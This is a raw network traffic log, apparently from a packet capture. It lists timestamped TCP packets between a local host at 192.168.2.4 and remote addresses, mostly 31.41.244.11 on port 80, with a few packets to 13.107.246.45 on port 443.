Nov 5, 2024 18:46:09.202991962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.202996016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203013897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203026056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203087091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203097105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203109026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203126907 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203130007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203154087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203176975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203273058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203284979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203294039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203320026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203336000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203346014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203356981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203365088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203376055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203382969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203385115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203393936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203421116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203649044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203666925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203675985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203689098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203702927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203764915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203802109 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203814030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203824997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203844070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203852892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203855991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203864098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203879118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203903913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203941107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203953981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203962088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203983068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203989983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.203991890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.203998089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204014063 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.204030991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.204096079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204106092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204114914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204123020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204137087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.204154015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.204154968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204164028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204176903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204188108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204193115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.204205036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.204215050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204231024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.204246044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.204313993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204322100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.204360962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.211673021 CET	443	49814	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.211853027 CET	443	49814	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.211914062 CET	49814	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.211947918 CET	49814	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.211966038 CET	443	49814	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.211997032 CET	49814	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.212004900 CET	443	49814	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.214553118 CET	49819	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.214575052 CET	443	49819	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.214664936 CET	49819	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.214822054 CET	49819	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:09.214832067 CET	443	49819	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:09.222923994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.222935915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.222945929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.222975016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.222990990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223006010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223010063 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223016977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223030090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223031998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223041058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223053932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223074913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223081112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223088980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223098993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223109007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223119974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223128080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223130941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223145962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223159075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223233938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223242998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223252058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223262072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223270893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223273039 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223282099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223289013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223293066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223318100 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223332882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223397970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223464012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223475933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223485947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223506927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223509073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223534107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223552942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223566055 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223575115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223587036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223596096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223596096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223607063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223609924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223638058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223689079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223697901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223707914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223732948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223748922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223907948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223947048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.223973989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.223984003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224014044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224037886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224047899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224054098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224064112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224085093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224104881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224205017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224216938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224225998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224235058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224246025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224250078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224268913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224275112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224278927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224288940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224297047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224299908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224313974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224329948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224338055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224339962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224349976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224359035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224359989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224370003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224380016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224385023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224387884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224397898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224411964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224432945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224459887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224468946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224474907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224498034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224499941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224508047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224515915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224525928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224531889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224545956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224553108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224590063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224600077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224600077 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224623919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224687099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224700928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224709988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224720955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224728107 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224737883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224747896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224749088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224759102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224781036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224791050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224859953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224869967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224879026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224898100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224905014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224916935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224925995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224931002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224932909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224936008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.224950075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224968910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.224991083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225002050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225011110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225033998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225047112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225193024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225204945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225210905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225240946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225244045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225253105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225264072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225274086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225275040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225290060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225298882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225300074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225325108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225380898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225392103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225403070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225419044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225425005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225430012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225436926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225439072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225461960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225462914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225486040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225512028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225531101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225542068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225552082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225567102 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225591898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225764990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225775003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225789070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.225811005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.225835085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.273358107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.273369074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.273380995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.273580074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.322851896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.322863102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.322876930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.322918892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.322930098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.322940111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.322949886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.322961092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.322977066 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.323041916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.323059082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323120117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323129892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323139906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323157072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.323184013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.323590994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323601961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323611975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323637009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.323658943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.323709965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323719978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323729992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323740959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323749065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.323759079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.323765993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.323796988 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.324047089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324111938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324122906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324151993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.324177980 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.324198008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324208975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324218988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324229956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324238062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.324239969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324254990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.324285984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324294090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.324296951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324306011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324327946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.324350119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.324892998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324902058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324911118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.324934959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.324964046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.324990034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325000048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325011015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325047016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325047970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325057983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325069904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325095892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325109959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325112104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325129986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325160027 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325191021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325201035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325242043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325252056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325263023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325273037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325294018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325304985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325476885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325485945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325496912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325522900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325551033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325627089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325640917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325649977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325670004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325680971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325684071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325685978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325691938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325710058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325716019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:09.325716019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:09.325726032 CET	80	49804	31.41.244.11	192.168.2.4
